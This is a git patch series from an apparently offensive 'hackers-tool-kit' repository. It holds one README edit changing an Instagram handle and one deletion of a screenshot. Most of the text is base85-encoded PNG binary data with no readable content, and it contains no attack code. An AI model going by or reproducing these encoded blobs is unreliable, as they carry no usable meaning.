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 literal 0 HcmV?d00001 From cfb5b87aa1a983e27ab1e2b2a3122dd3bf72fb50 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 8 May 2019 01:03:42 +0100 Subject: [PATCH 100/214] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 83278ae..3413707 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ # hackers-tool-kit Its a framework filled with alot of options and hacking tools you use directly in the script from brute forcing to payload making im still adding more stuff to see updates check on -my instagram @unkn0wn_bali +my instagram @tuf_unkn0wn ![](tools/screenshot1.png) From 8cdf90fb713bd76bd9696443ee8e4c4db12dfd0f Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 8 May 2019 01:06:00 +0100 Subject: [PATCH 101/214] Delete screenshot1.png --- tools/screenshot1.png | Bin 46770 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 tools/screenshot1.png diff --git a/tools/screenshot1.png b/tools/screenshot1.png deleted file mode 100644 index e24d0144581f19d0f0df68c4a18487acb1a2b165..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 46770 zcmb@uby$^a_brSC27&^Dv?79ZN=O-WD&5`PEvSezNJxj0(k0!}Euo}zcXyom=-$8c zzTf$-^VeCITZy%vbwBq#=a^%RIoI}iDJgXGI>B`m6qK7H!u--GC|BfBP%fcdMTMVq z^KyTOe=gfR7m>XR57(=@-taxXt$?DfjD^0fgO;@(ih;R>nI4^ujK3!kCsqDAGzEAK7wfrTGvtj=eZrT>+1;yc8^Vd z(RMF|PzGUTlKu18;#aD4w8|NnTwRS@wrdHMkh$PJ^Myhp+Hzy!+1hAX{qG8g&Lf-o zE@BKKj;GU20oz=z|Gdc|+V;lAL|TGdqU~ZYF4g*a&ADXwB~JIVN`bac8qqA@nJ)r< zxUVwh>CjOsYUQ?dV`K3( zXGeZYh5ENiNxQvoKUnBb$F{e(C*pAq$?Y5Q#)zs)W%{!NUhafivw4H67MUViEKy z8Z~Z<7*8r(_UQ$af=S&^f?p*G&a&>PeoDHXiR$roVnXx#_wSF?D@#+fnK>;dP)?6_ zSzeEo+tGwlN)-za?d|Oij*L*M=(ld&$SfIiZfE5_-di0x*&Wajk9%?l4Gpc2jjB85 zBq3RYV2(nLbet{eRSvvwr{$Bk7cQaB&~BLK?d&GIJtPa+Us+j+WYoIog+WY4OY1L_ zCb?OU$@k;yt0dL*+!tOLrh|EJSq!=?*G4(zb5undeecMa?RT(r=e<6*?@Hk7?oAP6 zslqHOD9}FGm^2-$jJknGZ@IUkRDHBW)AorbVvY9>jXXIktL*t6oEu62!DHOpexlx49tcvTDhUZSb3%@?918k6?`#ld0! z1f$s$wrA;QW?#At<;J$BhMCE<2_6BHzs6Q&WlI#Lq!%mY=+#6%2EI*QAI zo`i(NpNNyW=EZUI(SFUj*-_)(PM_2^oQ({`bKlXz!UA`Y$UvxfOQ=OxEN6eVO2qle zJYOuIJBfjTK{UHXSGGzCt-1o-TGV3`T!;=PFHF)@@hIkw=*KrSG&F|48F};=UYtq@mC9|Yc${~Hi>m50 zCknfH>)WWenXcZUmep+X$G2S>y!}S4!k)=)NfwqA+WFu<8JYBkqm$Ds$nd_J<~LNq z3R#LwebydzZ_?5X+&rU1cb9%H_N8IMaU=@(%{g!=^=8P?^yzF)PEM+pS$mF@SYQ(p z-rzpEIQsMF9ZXD2RaMomGHDokZDErWbsn4<1I^7|CF5=*J7osl@yL+}KM*P~=qCAq zLEHwX-xx^DweaK1rQhXt)5q&I-O|J&`-(SkX(yTj2-AN>P|19NTZ}3;`I&JC4TGrV zS*EpAAXet-@%}tqG)Xv^Y-jB^*8p~Ag6mc*wwjyP=Emd;NclHHNm$K+#O)t$5^ij6 zifq68xHB{|f{l$GI&GbplqAvGhlWX_$x0wG|EOlc8SA!F!O-9!qh>A2(axey`Li0U zY1A~yxVBG6IT|&R?csDH;^LP{s#-Kx2J>N)(cnJm)ygk(J9DkWGEBlh9E59q)hekEw{A%0VZ!j=0J(#cmz zU+>%&3L<$(OWUz?<6f&5sawmBFE2Lt_9(cyV|}nGQ~=|j{-fhzN4-4foSV2(tw9k)|NhgvF6bN{Q&O 